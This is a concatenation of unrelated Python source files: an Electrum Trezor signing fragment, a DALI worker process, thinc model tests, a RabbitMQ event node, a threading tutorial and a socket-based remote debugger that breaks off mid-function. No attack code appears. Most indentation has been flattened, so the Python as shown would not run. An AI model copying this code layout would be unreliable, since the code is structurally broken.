else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
                # because no more than one change address is allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
worker.py
|
# Copyright (c) 2020-2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import traceback
import os
import socket
from multiprocessing import reduction
from nvidia.dali._multiproc.shared_batch import SharedMemChunk, write_batch, assert_valid_data_type
from nvidia.dali._multiproc.messages import CompletedTasks
class _ProcessedTasks:
"""Internal worker message send to disptacher with completed tasks where it is
serialized and dispatched to the pool"""
def __init__(self, scheduled, mem_chunk=None, data_batch=None, exception=None,
traceback_str=None):
self.context_i = scheduled.context_i
self.batch_i = scheduled.batch_i
self.mem_chunk = mem_chunk
self.data_batch = data_batch
self.exception = exception
self.traceback_str = traceback_str
@classmethod
def done(cls, scheduled, mem_chunk, data_batch):
return cls(scheduled, mem_chunk, data_batch)
@classmethod
def failed(cls, scheduled, exception, traceback_str=None):
return cls(scheduled, exception=exception, traceback_str=traceback_str)
def is_failed(self):
return self.exception is not None
class SharedBatchesDispatcher:
"""SharedBatchesDispatcher serializes batches, puts them into provided
shared memory chunks and notifies parent process of batch ready to be read from shared memory.
    It keeps track of which shared memory chunks have already been sent and, if needed, sends
    file descriptors of memory chunks that the parent process hasn't seen yet.
Parameters
----------
`worker_id` : int
Id of the worker passed by the parent process. Added to messages sent over the ``res_pipe``
        to simplify bookkeeping in the parent process.
`sock` : socket
Python wrapper around Unix socket, capable of sending file descriptors between processes.
`res_pipe`: pipe
Pipe used to send parent process a notification (along with essential meta data info) about
ready batch in a given shared memory chunk.
"""
def __init__(self, worker_id, sock, res_pipe):
self.worker_id = worker_id
self.handle_sent = set()
self.sock = sock
self.res_pipe = res_pipe
self.ready_cv = threading.Condition()
self.ready_queue = []
def dispatch(self, processed_task: _ProcessedTasks):
"""Pass the processed task (or None to end) to the dispatcher.
"""
with self.ready_cv:
if processed_task is None:
self.ready_queue.insert(0, None)
else:
self.ready_queue.append(processed_task)
self.ready_cv.notify()
def dispatcher_thread(self):
"""Receives batches produced in the main thread and dispatches them to the parent process.
It is intended to be run in a separate thread because both callback and dispatcher may
wait on IO operations a lot and in that case Python threads provide some performance gain.
"""
try:
while True:
message = self._wait_for_processed()
if message is None:
break
self._send(message)
finally:
            # In case of an error, we don't know exactly when we were interrupted, and the main
            # process may be waiting for a different message than the one we would try to send.
            # Close the communication to signal the error to the main process and allow the
            # exception to propagate in the worker process.
self._shutdown()
def _wait_for_processed(self):
with self.ready_cv:
while len(self.ready_queue) == 0:
self.ready_cv.wait()
message = self.ready_queue.pop(0)
return message
def _send(self, processed_tasks: _ProcessedTasks):
"""Send the processed task back to the main process"""
if processed_tasks.is_failed(): # one of the tasks failed
completed_tasks = CompletedTasks.failed(self.worker_id, processed_tasks)
self.res_pipe.send(completed_tasks)
return
serialized_batch = write_batch(processed_tasks.mem_chunk, processed_tasks.data_batch)
completed_tasks = CompletedTasks.done(self.worker_id, processed_tasks, serialized_batch)
self.res_pipe.send(completed_tasks)
        # send the handle of the underlying shared memory chunk
        # if it has never been sent before
mem_chunk_id = serialized_batch.mem_chunk_id
if mem_chunk_id not in self.handle_sent:
self.handle_sent.add(mem_chunk_id)
reduction.send_handle(self.sock, processed_tasks.mem_chunk.shm_chunk.handle, os.getppid())
def _shutdown(self):
"""Force to close all communication channels (sockets and pipes) to unlock main process
in case of error, when it may be waiting for messages that we can't deliver or the
state of protocol is mismatched"""
self.res_pipe.close()
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
class TaskReceiver:
def __init__(self, task_pipe):
self.task_pipe = task_pipe
self.tasks_cv = threading.Condition()
self.tasks_queue = []
def get_task(self):
with self.tasks_cv:
while len(self.tasks_queue) == 0:
self.tasks_cv.wait()
scheduled = self.tasks_queue.pop(0)
return scheduled
def receiver_thread(self):
"""Receives list of tasks scheduled to be done by the worker.
        Intended to be run in a separate thread to avoid blocking the main process when
        it schedules another batch for the worker while the worker is busy with previously
        scheduled computations.
"""
try:
while True:
scheduled = self.task_pipe.recv()
if scheduled is None:
break
self._insert_task(scheduled)
finally:
self._insert_task(None)
def _insert_task(self, scheduled_task):
with self.tasks_cv:
if scheduled_task is None:
self.tasks_queue.insert(0, None)
else:
self.tasks_queue.append(scheduled_task)
self.tasks_cv.notify()
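# --- Hedged illustration (not part of the original DALI module) ---------------
# Both TaskReceiver and SharedBatchesDispatcher rely on the same hand-off
# pattern: a plain list guarded by a threading.Condition, where a ``None``
# sentinel is pushed to the *front* of the queue so that shutdown is observed
# before any still-pending work. The sketch below reproduces that pattern in
# isolation; the ``_demo_*`` name is illustrative and does not exist in DALI.
def _demo_condition_handoff():
    cv = threading.Condition()
    items = []
    def put(item):
        with cv:
            if item is None:
                items.insert(0, None)  # shutdown sentinel jumps the queue
            else:
                items.append(item)
            cv.notify()
    def get():
        with cv:
            while not items:
                cv.wait()
            return items.pop(0)
    put("task")
    put(None)
    return get()  # returns None: the sentinel is seen before the pending task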
class CallbackContext:
"""Worker can run multiple Python callbacks, CallbackContext is used to
(independently from other callbacks) manage shared memory used to pass
results of the callback calls.
"""
def __init__(self, callback, mem_chunks):
self.callback = callback
self.mem_chunks = mem_chunks
def close(self):
for chunk in self.mem_chunks:
chunk.close()
def worker(worker_id, callbacks, prefetch_queue_depths, initial_chunk_size, task_pipe, res_pipe, sock, callback_pickler):
"""Entry point of worker process.
    Computes the data in the main thread, while separate threads:
* waits for incoming tasks,
* serializes results and passes them to the main process.
Parameters
----------
`callbacks` : callable list
List of callables that worker can call to perform a (part of parallelized) task.
`prefetch_queue_depths` : list of int
        Number of shared memory chunks that should be allocated per callback, used in a cyclic-buffer manner
to pass callback results to parent process.
`initial_chunk_size` : int
Initial size of shared memory chunk.
`task_pipe`: Pipe
Pipe used to read list of tasks that given callback should be run on to produce (part of a) result batch.
`res_pipe`: Pipe
Pipe used to notify the parent process about another batch ready to read in the given memory chunk.
`sock` : socket
Python wrapper around Unix socket used to pass file descriptors identifying shared memory chunk to parent process.
"""
if callback_pickler is not None:
callbacks = callback_pickler.loads(callbacks)
contexts = None
batch_dispatcher = SharedBatchesDispatcher(worker_id, sock, res_pipe)
task_receiver = TaskReceiver(task_pipe)
# run the thread as a daemon so that even when results queue blocks, worker process can exit anyway
# and can be joined in the parent process
dispatcher_thread = threading.Thread(target=batch_dispatcher.dispatcher_thread, daemon=True)
receiver_thread = threading.Thread(target=task_receiver.receiver_thread, daemon=True)
dispatcher_thread.start()
receiver_thread.start()
try:
contexts = [
CallbackContext(callback, [
SharedMemChunk("chunk_{}_{}_{}".format(worker_id, callback_idx, prefetch_idx), initial_chunk_size)
for prefetch_idx in range(prefetch_queue_depth)
])
for callback_idx, (callback, prefetch_queue_depth) in enumerate(zip(callbacks, prefetch_queue_depths))
]
while True:
scheduled = task_receiver.get_task()
if scheduled is None:
break
context = contexts[scheduled.context_i]
callback = context.callback
try:
data_batch = [(task_id, callback(*task_args))
for (task_id, task_args) in scheduled.tasks]
for i, sample in data_batch:
assert_valid_data_type(sample)
except Exception as exception:
tb_str = traceback.format_exc()
processed = _ProcessedTasks.failed(scheduled, exception, tb_str)
else:
processed = _ProcessedTasks.done(scheduled, context.mem_chunks[scheduled.dst_chunk_i], data_batch)
batch_dispatcher.dispatch(processed)
finally:
batch_dispatcher.dispatch(None)
if contexts is not None:
for context in contexts:
context.close()
|
test_model.py
|
# encoding: utf8
from __future__ import unicode_literals
import tempfile
import os
import pytest
import threading
import time
from ...neural._classes import model as base
from ...neural.ops import NumpyOps
@pytest.fixture
def model_with_no_args():
model = base.Model()
return model
def test_Model_defaults_to_name_model(model_with_no_args):
assert model_with_no_args.name == "model"
def test_changing_instance_name_doesnt_change_class_name():
model = base.Model()
assert model.name != "changed"
model.name = "changed"
model2 = base.Model()
assert model2.name != "changed"
def test_changing_class_name_doesnt_change_default_instance_name():
model = base.Model()
assert model.name != "changed"
base.Model.name = "changed"
assert model.name != "changed"
# Reset state
base.Model.name = "model"
def test_changing_class_name_doesnt_change_nondefault_instance_name():
model = base.Model(name="nondefault")
assert model.name == "nondefault"
base.Model.name = "changed"
assert model.name == "nondefault"
def test_Model_defaults_to_cpu(model_with_no_args):
assert isinstance(model_with_no_args.ops, NumpyOps)
def test_models_get_different_ids(model_with_no_args):
model1 = base.Model()
model2 = base.Model()
assert model1.id != model2.id
def test_init_assigns_attributes():
model = base.Model()
model._mem
assert model._layers == []
assert model._operators == {}
def test_init_installs_via_descriptions():
def mock_install(attr, self):
setattr(self, attr, "model=" + self.name)
base.Model.descriptions = [("myattr", mock_install)]
model = base.Model(name="model1")
assert model.myattr == "model=%s" % "model1"
model2 = base.Model(name="model2")
assert model2.myattr == "model=%s" % "model2"
def test_init_calls_hooks():
def mock_init_hook(self, *args, **kwargs):
setattr(self, "hooked", (args, kwargs))
base.Model.on_init_hooks = [mock_init_hook]
model = base.Model(0, 1, 2)
assert model.hooked == ((0, 1, 2), {})
model2 = base.Model(value="something")
assert model2.hooked == (tuple(), {"value": "something"})
def test_use_device():
dev_id = id(base.Model.ops)
with base.Model.use_device(base.Model.ops.device):
assert id(base.Model.ops) == dev_id
with base.Model.use_device("gpu"):
assert id(base.Model.ops) != dev_id
assert id(base.Model.ops) == dev_id
def test_bind_plus():
with base.Model.define_operators({"+": lambda a, b: (a.name, b.name)}):
m = base.Model(name="a") + base.Model(name="b")
assert m == ("a", "b")
def test_plus_chain():
with base.Model.define_operators({"+": lambda a, b: a}):
m = (
base.Model(name="a")
+ base.Model(name="b")
+ base.Model(name="c")
+ base.Model(name="d")
)
assert m.name == "a"
def test_overload_operators_in_subthread():
"""Test we can create a model in a child thread with overloaded operators."""
# Worker1 will start and run, while worker 2 sleeps after Model.define_operators.
# Without thread-safety, worker2 will find that its operator definitions
# have been removed, causing an error.
worker1 = threading.Thread(target=_overload_plus, args=("+", 1))
worker2 = threading.Thread(target=_overload_plus, args=("*", 3,))
worker2.start()
worker1.start()
worker1.join()
worker2.join()
def _overload_plus(operator, sleep):
m1 = base.Model(name="a")
m2 = base.Model(name="b")
with base.Model.define_operators({operator: lambda a, b: a.name + b.name}):
time.sleep(sleep)
if operator == "+":
value = m1 + m2
else:
value = m1 * m2
assert value == "ab"
@pytest.mark.parametrize("op", "+ - * @ / // % ** << >> & ^ |".split())
def test_all_operators(op):
m1 = base.Model(name="a")
m2 = base.Model(name="b")
with base.Model.define_operators({op: lambda a, b: a.name + b.name}):
if op == "+":
value = m1 + m2
else:
with pytest.raises(TypeError):
value = m1 + m2
if op == "-":
value = m1 - m2
else:
with pytest.raises(TypeError):
value = m1 - m2
if op == "*":
value = m1 * m2
else:
with pytest.raises(TypeError):
value = m1 * m2
if op == "@":
value = m1.__matmul__(m2) # Be kind to Python 2...
else:
with pytest.raises(TypeError):
value = m1.__matmul__(m2)
if op == "/":
value = m1 / m2
else:
with pytest.raises(TypeError):
value = m1 / m2
if op == "//":
value = m1 // m2
else:
with pytest.raises(TypeError):
value = m1 // m2
if op == "^":
value = m1 ^ m2
else:
with pytest.raises(TypeError):
value = m1 ^ m2
if op == "%":
value = m1 % m2
else:
with pytest.raises(TypeError):
value = m1 % m2
if op == "**":
value = m1 ** m2
else:
with pytest.raises(TypeError):
value = m1 ** m2
if op == "<<":
value = m1 << m2
else:
with pytest.raises(TypeError):
value = m1 << m2
if op == ">>":
value = m1 >> m2
else:
with pytest.raises(TypeError):
value = m1 >> m2
if op == "&":
value = m1 & m2
else:
with pytest.raises(TypeError):
value = m1 & m2
if op == "^":
value = m1 ^ m2
else:
with pytest.raises(TypeError):
value = m1 ^ m2
if op == "|":
value = m1 | m2
else:
with pytest.raises(TypeError):
value = m1 | m2 # noqa: F841
assert base.Model._operators == {}
def test_model_can_save_to_disk(model_with_no_args):
temp_file = os.path.join(tempfile.mkdtemp(), "thinc_model")
model_with_no_args.to_disk(temp_file)
def test_model_can_load_from_disk(model_with_no_args):
temp_file = os.path.join(tempfile.mkdtemp(), "thinc_model")
model_with_no_args.to_disk(temp_file)
m2 = model_with_no_args.from_disk(temp_file)
assert model_with_no_args.to_bytes() == m2.to_bytes()
|
eventnode.py
|
#!/usr/bin/python3
# coding=utf-8
# Copyright 2021 getcarrier.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Event node
Allows emitting and consuming global events
Emit an event: main thread
Listen for events from the queue: thread one
Run callbacks: thread two
The listening and callback threads are synced using a local Queue
Event payloads are serialized, gzipped and signed before being sent to the queue
"""
import threading
import pickle
import queue
import time
import gzip
import hmac
import pika # pylint: disable=E0401
from arbiter import log
from arbiter.config import Config
class EventNode: # pylint: disable=R0902
""" Event node - allows to subscribe to events and to emit new events """
def __init__(
self, host, port, user, password, vhost="carrier", event_queue="events",
hmac_key=None, hmac_digest="sha512", callback_workers=1,
ssl_context=None, ssl_server_hostname=None,
): # pylint: disable=R0913
self.queue_config = Config(host, port, user, password, vhost, event_queue, all_queue=None)
self.event_callbacks = dict() # event_name -> [callbacks]
#
self.ssl_context = ssl_context
self.ssl_server_hostname = ssl_server_hostname
#
self.hmac_key = hmac_key
self.hmac_digest = hmac_digest
if self.hmac_key is not None and isinstance(self.hmac_key, str):
self.hmac_key = self.hmac_key.encode("utf-8")
#
self.retry_interval = 3.0
#
self.stop_event = threading.Event()
self.event_lock = threading.Lock()
self.sync_queue = queue.Queue()
#
self.listening_thread = threading.Thread(target=self._listening_worker, daemon=True)
self.callback_threads = list()
for _ in range(callback_workers):
self.callback_threads.append(
threading.Thread(target=self._callback_worker, daemon=True)
)
#
self.ready_event = threading.Event()
self.started = False
def start(self):
""" Start event node """
if self.started:
return
#
self.listening_thread.start()
for callback_thread in self.callback_threads:
callback_thread.start()
#
self.ready_event.wait()
self.started = True
def stop(self):
""" Stop event node """
self.stop_event.set()
@property
def running(self):
""" Check if it is time to stop """
return not self.stop_event.is_set()
def subscribe(self, event_name, callback):
""" Subscribe to event """
with self.event_lock:
if event_name not in self.event_callbacks:
self.event_callbacks[event_name] = list()
if callback not in self.event_callbacks[event_name]:
self.event_callbacks[event_name].append(callback)
def unsubscribe(self, event_name, callback):
""" Unsubscribe from event """
with self.event_lock:
if event_name not in self.event_callbacks:
return
if callback not in self.event_callbacks[event_name]:
return
self.event_callbacks[event_name].remove(callback)
def emit(self, event_name, payload=None):
""" Emit event with payload data """
connection = self._get_connection()
channel = self._get_channel(connection)
#
event = {
"name": event_name,
"payload": payload,
}
body = gzip.compress(pickle.dumps(event, protocol=pickle.HIGHEST_PROTOCOL))
if self.hmac_key is not None:
digest = hmac.digest(self.hmac_key, body, self.hmac_digest)
body = body + digest
#
channel.basic_publish(
exchange=self.queue_config.queue,
routing_key="",
body=body,
properties=pika.BasicProperties(
delivery_mode=2
)
)
#
connection.close()
def _listening_worker(self):
while self.running:
try:
connection = self._get_connection()
channel = self._get_channel(connection)
#
exchange_queue = channel.queue_declare(queue="", exclusive=True)
channel.queue_bind(
exchange=self.queue_config.queue,
queue=exchange_queue.method.queue
)
channel.basic_consume(
queue=exchange_queue.method.queue,
on_message_callback=self._listening_callback,
auto_ack=True
)
#
self.ready_event.set()
#
channel.start_consuming()
except: # pylint: disable=W0702
log.exception(
"Exception in listening thread. Retrying in %s seconds", self.retry_interval
)
time.sleep(self.retry_interval)
finally:
try:
connection.close()
except: # pylint: disable=W0702
pass
def _listening_callback(self, channel, method, properties, body):
_ = channel, method, properties
self.sync_queue.put(body)
def _callback_worker(self):
while self.running:
try:
body = self.sync_queue.get()
#
if self.hmac_key is not None:
hmac_obj = hmac.new(self.hmac_key, digestmod=self.hmac_digest)
hmac_size = hmac_obj.digest_size
#
body_digest = body[-hmac_size:]
body = body[:-hmac_size]
#
digest = hmac.digest(self.hmac_key, body, self.hmac_digest)
#
if not hmac.compare_digest(body_digest, digest):
log.error("Invalid event digest, skipping")
continue
#
event = pickle.loads(gzip.decompress(body))
#
event_name = event.get("name")
event_payload = event.get("payload")
#
with self.event_lock:
if event_name not in self.event_callbacks:
continue
callbacks = self.event_callbacks[event_name].copy()
#
for callback in callbacks:
try:
callback(event_name, event_payload)
except: # pylint: disable=W0702
log.exception("Event callback failed, skipping")
except: # pylint: disable=W0702
log.exception("Error during event processing, skipping")
def _get_connection(self):
while self.running:
try:
#
pika_ssl_options = None
if self.ssl_context is not None:
pika_ssl_options = pika.SSLOptions(self.ssl_context, self.ssl_server_hostname)
#
connection = pika.BlockingConnection(
pika.ConnectionParameters(
host=self.queue_config.host,
port=self.queue_config.port,
virtual_host=self.queue_config.vhost,
credentials=pika.PlainCredentials(
self.queue_config.user,
self.queue_config.password
),
ssl_options=pika_ssl_options,
)
)
connection.process_data_events()
return connection
except: # pylint: disable=W0702
log.exception(
"Failed to create connection. Retrying in %s seconds", self.retry_interval
)
time.sleep(self.retry_interval)
def _get_channel(self, connection):
channel = connection.channel()
channel.exchange_declare(
exchange=self.queue_config.queue,
exchange_type="fanout",
durable=True
)
return channel
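# --- Hedged round-trip sketch (not part of the original module) ---------------
# Illustrates the framing used by emit() and _callback_worker() above:
# gzip(pickle(event)) with an HMAC digest appended, then split and verified on
# the receiving side. The function name and default arguments are illustrative only.
def _example_sign_and_verify(event, key=b"secret", digest="sha512"):
    body = gzip.compress(pickle.dumps(event, protocol=pickle.HIGHEST_PROTOCOL))
    signed = body + hmac.digest(key, body, digest)
    #
    hmac_size = hmac.new(key, digestmod=digest).digest_size
    payload, tag = signed[:-hmac_size], signed[-hmac_size:]
    if not hmac.compare_digest(tag, hmac.digest(key, payload, digest)):
        raise ValueError("Invalid event digest")
    return pickle.loads(gzip.decompress(payload))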
class MockEventNode: # pylint: disable=R0902
""" Event node - allows to subscribe to events and to emit new events - local-only mock """
def __init__(self): # pylint: disable=R0913
self.event_callbacks = dict() # event_name -> [callbacks]
self.started = True
def start(self):
""" Start event node """
def stop(self):
""" Stop event node """
@property
def running(self):
""" Check if it is time to stop """
return True
def subscribe(self, event_name, callback):
""" Subscribe to event """
if event_name not in self.event_callbacks:
self.event_callbacks[event_name] = list()
if callback not in self.event_callbacks[event_name]:
self.event_callbacks[event_name].append(callback)
def unsubscribe(self, event_name, callback):
""" Unsubscribe from event """
if event_name not in self.event_callbacks:
return
if callback not in self.event_callbacks[event_name]:
return
self.event_callbacks[event_name].remove(callback)
def emit(self, event_name, payload=None):
""" Emit event with payload data """
if event_name not in self.event_callbacks:
return
for callback in self.event_callbacks[event_name]:
try:
callback(event_name, payload)
except: # pylint: disable=W0702
log.exception("Event callback failed, skipping")
|
1_basic.py
|
"""
Terminologies:
- CPU - Piece of hardware that executes code
- OS - Handles the scheduling of when the CPU can be used
- PROCESS - A program that is being executed
- THREAD - A part of the program that uses the CPU. Some programs are so
           simple that they only do one thing, so they really need only one
           thread, whereas other, more complex programs require more
           functionality and efficiency, so they might use many threads.
"""
import time
import threading
# Issues with single threaded programs.
def single(name):
print(f"single started with arg {name}")
# assume this to be some sort of a complex calculation which takes time to
# process
time.sleep(2)
print('single ended')
"""
__name__ tells us in which context this module is being initialized or
executed; there are basically 2 ways a file gets executed:
1. we run this file directly in the terminal, in which case __name__ holds
the value '__main__'.
2. some other file imports it, in which case __name__ holds the module's
name.
This simple distinction helps us write code in such a way that we can execute
the functionality provided by the module and see the output, while still being
able to export that functionality without executing it at the same time.
"""
if __name__ == '__main__':
print('main started')
single('realpython')
print('main ended')
"""
When we call the function directly, the program is blocked until the function
returns, and in the meantime we are not able to interact with the
program.
"""
def func(name):
print(f'func started with arg {name}')
time.sleep(2)
print('func ended')
if __name__ == '__main__':
print()
print('main started')
# we are creating a new Thread using the Thread class from threading module,
# we are also associating that thread with a target function that needs to
# be executed in a multithreaded environment.
t = threading.Thread(target=func, args=['realpython'])
# to start the thread we call the method start() on the created object
t.start()
print('\nmain ended')
"""This way we can create a non-blocking code"""
|
sdb.py
|
from __future__ import print_function
import cmd
import contextlib
import errno
import logging
import os
import pprint
import re
import rlcompleter
import select
import signal
import socket
import sys
import termios
import threading
import tty
from multiprocessing import process
from pdb import Pdb
import six
from six.moves.queue import Queue, Empty
from pygments import highlight
from pygments.lexers import PythonLexer
from pygments.formatters import Terminal256Formatter
__all__ = (
'SDB_HOST', 'SDB_PORT', 'SDB_NOTIFY_HOST', 'SDB_COLORIZE',
'DEFAULT_PORT', 'Sdb', 'debugger', 'set_trace',
)
DEFAULT_PORT = 6899
SDB_HOST = os.environ.get('SDB_HOST') or '127.0.0.1'
SDB_PORT = int(os.environ.get('SDB_PORT') or DEFAULT_PORT)
SDB_NOTIFY_HOST = os.environ.get('SDB_NOTIFY_HOST') or '127.0.0.1'
SDB_CONTEXT_LINES = os.environ.get('SDB_CONTEXT_LINES') or 60
SDB_COLORIZE = bool(int(os.environ.get('SDB_COLORIZE') or 1))
#: Holds the currently active debugger.
_current = [None]
_frame = getattr(sys, '_getframe')
NO_AVAILABLE_PORT = """\
Couldn't find an available port.
Please specify one using the SDB_PORT environment variable.
"""
BANNER = """\
{self.ident}: Ready to connect: telnet {self.host} {self.port}
Type `exit` in session to continue.
{self.ident}: Waiting for client...
"""
SESSION_STARTED = '{self.ident}: Now in session with {self.remote_addr}.'
SESSION_ENDED = '{self.ident}: Session with {self.remote_addr} ended.'
class SocketCompleter(rlcompleter.Completer):
def global_matches(self, text):
"""Compute matches when text is a simple name.
Return a list of all keywords, built-in functions and names currently
defined in self.namespace that match.
"""
matches = []
n = len(text)
for word in self.namespace:
if word[:n] == text and word != "__builtins__":
matches.append(word)
return matches
class Sdb(Pdb):
"""Socket-based debugger."""
me = 'Socket Debugger'
_prev_outs = None
_sock = None
_completer = SocketCompleter()
def __init__(self, host=SDB_HOST, port=SDB_PORT,
notify_host=SDB_NOTIFY_HOST, context_lines=SDB_CONTEXT_LINES,
port_search_limit=100, port_skew=+0, out=sys.stdout,
colorize=SDB_COLORIZE):
self.active = True
self.out = out
self.colorize = colorize
self._prev_handles = sys.stdin, sys.stdout
self.notify_host = notify_host
self.context_lines = int(context_lines)
self._sock, this_port = self.get_avail_port(
host, port, port_search_limit, port_skew,
)
self._sock.setblocking(1)
self._sock.listen(1)
self.host = host
self.port = this_port
self.ident = '{0}:{1}'.format(self.me, this_port)
self.say(BANNER.format(self=self))
self._client, address = self._sock.accept()
self._client.setblocking(1)
self.remote_addr = ':'.join(str(v) for v in address)
self.say(SESSION_STARTED.format(self=self))
self._handle = sys.stdin = sys.stdout = self._client.makefile('rw')
Pdb.__init__(self, stdin=self._handle, stdout=self._handle)
self.prompt = ''
def complete(self, text):
ns = {}
ns.update(self.curframe.f_globals.copy())
ns.update(self.curframe.f_locals.copy())
ns.update(__builtins__)
self._completer.namespace = ns
self._completer.use_main_ns = 0
self._completer.complete(text, 0)
return self._completer.matches
def get_avail_port(self, host, port, search_limit=100, skew=+0):
try:
_, skew = process._current_process.name.split('-')
skew = int(skew)
except ValueError:
pass
this_port = None
for i in range(search_limit):
_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
this_port = port + skew + i
try:
_sock.bind((host, this_port))
except socket.error as exc:
if exc.errno in [errno.EADDRINUSE, errno.EINVAL]:
continue
raise
else:
if self.notify_host:
socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(
str(this_port).encode('utf-8'),
(self.notify_host, 6899)
)
return _sock, this_port
else:
raise Exception(NO_AVAILABLE_PORT.format(self=self))
def __enter__(self):
return self
def __exit__(self, *exc_info):
self._close_session()
def _close_session(self):
self.stdin, self.stdout = sys.stdin, sys.stdout = self._prev_handles
if self.active:
if self._handle is not None:
self._handle.close()
if self._client is not None:
self._client.close()
if self._sock is not None:
self._sock.close()
self.active = False
self.say(SESSION_ENDED.format(self=self))
def do_continue(self, arg):
self._close_session()
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_quit(self, arg):
self._close_session()
self.set_quit()
return 1
do_q = do_exit = do_quit
def set_quit(self):
# this raises a BdbQuit exception that we're unable to catch.
sys.settrace(None)
def cmdloop(self):
self.do_list(tuple())
return cmd.Cmd.cmdloop(self)
def do_list(self, args):
lines = self.context_lines
context = (lines - 2) / 2
if not args:
first = max(1, self.curframe.f_lineno - context)
last = first + context * 2
args = six.text_type('%s, %s') % (
six.text_type(int(first)),
six.text_type(int(last)),
)
self.lineno = None
with style(self, (
self.curframe.f_code.co_filename, self.curframe.f_lineno - context)
):
Pdb.do_list(self, args)
do_l = do_list
def format_stack_entry(self, *args, **kwargs):
entry = Pdb.format_stack_entry(self, *args, **kwargs)
return '\n'.join(
filter(lambda x: not x.startswith('->'), entry.splitlines())
)
def print_stack_entry(self, *args, **kwargs):
with style(self):
return Pdb.print_stack_entry(self, *args, **kwargs)
def default(self, line):
with style(self):
return Pdb.default(self, line)
def parseline(self, line):
line = line.strip()
match = re.search('^([0-9]+)([a-zA-Z]+.*)', line)
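        # A leading number repeats a command, e.g. ``3n`` runs ``n`` now and queues two more.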
if match:
times, command = match.group(1), match.group(2)
line = command
self.cmdqueue.extend([
command for _ in range(int(times) - 1)
])
if line.startswith('lines '):
try:
self.context_lines = int(line.split(' ')[1])
line = 'l'
except ValueError:
pass
if line == '?':
line = 'dir()'
elif line.endswith('??'):
line = "import inspect; print(''.join(inspect.getsourcelines(%s)[0][:25]))" % line[:-2] # noqa
elif line.endswith('?'):
line = 'dir(%s)' % line[:-1]
return cmd.Cmd.parseline(self, line)
def emptyline(self):
pass
def onecmd(self, line):
line = line.strip()
if line.endswith('<!TAB!>'):
line = line.split('<!TAB!>')[0]
matches = self.complete(line)
if len(matches):
self.stdout.write(' '.join(matches))
self.stdout.flush()
return False
return Pdb.onecmd(self, line)
def displayhook(self, obj):
if obj is not None and not isinstance(obj, list):
return pprint.pprint(obj)
return Pdb.displayhook(self, obj)
def say(self, m):
logging.warning(m)
def debugger():
"""Return the current debugger instance, or create if none."""
sdb = _current[0]
if sdb is None or not sdb.active:
sdb = _current[0] = Sdb()
return sdb
def set_trace(frame=None):
"""Set break-point at current location, or a specified frame."""
if frame is None:
frame = _frame().f_back
return debugger().set_trace(frame)
def sigtrap(*args, **kw):
signal.signal(
signal.SIGTRAP,
lambda signum, frame: Sdb(*args, **kw).set_trace(frame.f_back)
)
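# --- Hedged usage sketch (not part of the original module) --------------------
# Typical flow implied by BANNER above: drop set_trace() into the code under
# test, then attach with ``telnet <SDB_HOST> <port>`` (or run the listen()
# helper defined below, which waits for the UDP port notification on :6899).
# The function below is illustrative only and is never called.
def _example_breakpoint():
    x = 41
    set_trace()  # opens a listening socket and blocks until a client attaches
    return x + 1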
@contextlib.contextmanager
def style(im_self, filepart=None, lexer=None):
lexer = PythonLexer
old_stdout = im_self.stdout
class NoneBuffer(six.StringIO):
def write(self, x):
if x == '':
x = "''"
six.StringIO.write(self, x)
buff = NoneBuffer()
im_self.stdout = buff
yield
value = buff.getvalue()
context = len(value.splitlines())
file_cache = {}
if filepart:
filepath, lineno = filepart
if filepath not in file_cache:
with open(filepath, 'r') as source:
file_cache[filepath] = source.readlines()
value = ''.join(file_cache[filepath][:int(lineno) - 1]) + value
if not value.strip():
value = 'None\n'
if im_self.colorize is True:
formatter = Terminal256Formatter(style='friendly')
